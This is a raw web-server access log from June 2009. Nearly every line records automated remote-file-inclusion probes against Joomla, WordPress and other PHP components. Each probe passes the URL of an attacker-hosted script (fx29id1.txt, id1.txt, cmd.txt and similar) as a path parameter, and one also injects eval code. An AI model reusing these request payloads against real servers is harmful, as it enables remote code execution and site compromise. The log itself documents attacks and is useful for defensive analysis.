62.140.23.192 - - [04/Jun/2009:00:25:38 -0500] "GET /logs/access_log.1237680000/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:00:25:38 -0500] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:00:25:48 -0500] "GET /logs/access_log.1241308800/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:00:25:55 -0500] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:00:25:55 -0500] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:00:25:55 -0500] "GET /logs/access_log.1237680000/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:00:26:00 -0500] "GET /logs/access_log.1241308800/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:26:16 -0500] "GET /main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:26:16 -0500] "GET /logs/access_log.1239667200/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:26:16 -0500] "GET /logs/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:26:16 -0500] "GET /logs/access_log.1240185600/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:26:41 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:26:41 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:26:41 -0500] "GET /logs/access_log.1239667200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:27:00 -0500] "GET /logs/access_log.1239235200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.55.106.148 - - [04/Jun/2009:00:27:06 -0500] "GET /logs/access_log.1182902400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [04/Jun/2009:00:27:16 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:27:16 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:27:16 -0500] "GET /logs/access_log.1239667200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:27:17 -0500] "GET /logs/access_log.1241049600/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:27:38 -0500] "GET /logs/access_log.1238112000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:28:12 -0500] "GET /logs/access_log.1238112000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:00:31:08 -0500] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:00:31:08 -0500] "GET /logs/access_log.1237680000/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:00:31:08 -0500] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:31:08 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:31:08 -0500] "GET /logs/access_log.1240185600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:31:08 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:00:31:14 -0500] "GET /logs/access_log.1241308800/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:00:32:02 -0500] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:00:32:02 -0500] "GET /logs/access_log.1238544000/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:00:32:02 -0500] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:00:32:06 -0500] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:00:32:06 -0500] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:00:32:06 -0500] "GET /logs/access_log.1238544000/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:35:28 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:35:28 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:35:28 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:35:42 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:35:42 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:35:42 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:35:51 -0500] "GET /logs/access_log.1240876800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:36:08 -0500] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:36:12 -0500] "GET /logs/access_log.1238544000/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:36:13 -0500] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:36:51 -0500] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:36:51 -0500] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:36:51 -0500] "GET /logs/access_log.1238544000/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:00:37:16 -0500] "GET /phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:00:37:16 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:00:37:22 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:39:20 -0500] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:39:20 -0500] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:39:20 -0500] "GET /logs/access_log.1237766400/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:39:20 -0500] "GET /logs/access_log.1235606400/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:39:38 -0500] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:39:38 -0500] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:39:39 -0500] "GET /logs/access_log.1235606400/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:00:44:09 -0500] "GET /phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:00:44:09 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:00:44:09 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.38.12.194 - - [04/Jun/2009:00:46:42 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.poisongame.altervista.org/cmd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
218.185.20.88 - - [04/Jun/2009:00:49:08 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:49:08 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:49:08 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:49:30 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:49:30 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:49:35 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:50:14 -0500] "GET /logs/access_log.1240531200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:00:50:41 -0500] "GET /logs/access_log.1240531200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:51:02 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:51:02 -0500] "GET /include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:51:02 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:00:51:09 -0500] "GET /logs/access_log.1242000000/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:00:51:18 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:00:51:18 -0500] "GET /logs/access_log.1240358400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:00:51:19 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:00:51:33 -0500] "GET /logs/access_log.1240444800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:52:13 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:52:13 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:52:13 -0500] "GET /logs/access_log.1240444800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:00:52:13 -0500] "GET /logs/access_log.1240185600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:52:37 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:52:37 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:52:37 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.208.143 - - [04/Jun/2009:00:53:42 -0500] "GET /logs/access_log.1156118400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.211 - - [04/Jun/2009:00:54:06 -0500] "GET /logs/access_log.1218844800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.203 - - [04/Jun/2009:00:54:38 -0500] "GET /logs/access_log.1223769600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [04/Jun/2009:00:57:42 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:57:42 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:57:42 -0500] "GET /include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:00:58:18 -0500] "GET /logs/access_log.1242000000/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:01:46 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:01:46 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:01:46 -0500] "GET /logs/access_log.1239926400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:01:47 -0500] "GET /logs/access_log.1240358400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:02:30 -0500] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:02:30 -0500] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:02:30 -0500] "GET /logs/access_log.1238025600//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
217.147.29.190 - - [04/Jun/2009:01:03:35 -0500] "GET /logs/access_log.1241913600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:01:05:43 -0500] "GET /main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:01:05:43 -0500] "GET /logs/access_log.1239667200/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:01:05:43 -0500] "GET /logs/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:01:05:43 -0500] "GET /logs/access_log.1240185600/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:06:58 -0500] "GET /logs/access_log.1236643200//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.55.106.219 - - [04/Jun/2009:01:07:06 -0500] "GET /logs/access_log.1127606400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.149.157.130 - - [04/Jun/2009:01:07:25 -0500] "GET /logs/access_log.1236643200//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:07:25 -0500] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:07:25 -0500] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
69.50.197.106 - - [04/Jun/2009:01:07:36 -0500] "GET /logs/access_log.1241049600/main.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.45.45.133 - - [04/Jun/2009:01:08:04 -0500] "GET /logs/access_log.1238025600/local.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:08:10 -0500] "GET ///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:08:11 -0500] "GET /logs///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:08:11 -0500] "GET /logs/access_log.1237766400///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:08:11 -0500] "GET /logs/access_log.1239753600///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
220.181.7.97 - - [04/Jun/2009:01:10:50 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
62.149.15.68 - - [04/Jun/2009:01:12:10 -0500] "GET //?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
62.149.15.68 - - [04/Jun/2009:01:12:10 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.149.15.68 - - [04/Jun/2009:01:12:12 -0500] "GET /logs//?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:17:22 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:17:22 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:17:22 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:17:22 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:17:22 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
